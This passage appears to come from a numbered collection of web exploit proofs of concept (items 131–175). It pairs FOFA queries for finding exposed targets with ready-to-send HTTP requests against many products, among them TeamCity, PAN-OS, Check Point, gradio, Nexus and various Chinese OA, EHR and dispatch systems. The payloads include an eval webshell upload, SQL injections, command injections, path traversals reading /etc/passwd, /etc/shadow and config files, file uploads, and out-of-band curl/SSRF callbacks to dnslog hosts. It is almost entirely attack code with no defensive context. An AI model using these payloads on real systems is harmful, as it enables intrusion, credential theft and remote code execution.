User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. 网康 NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立迅通信 command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. 福建科立讯通信 command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. 福建科立讯通信 command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. 福建科立讯通信 command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. 福建科立讯通信 command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at the path returned in the response: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee collection system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field specifies the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT high-definition license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
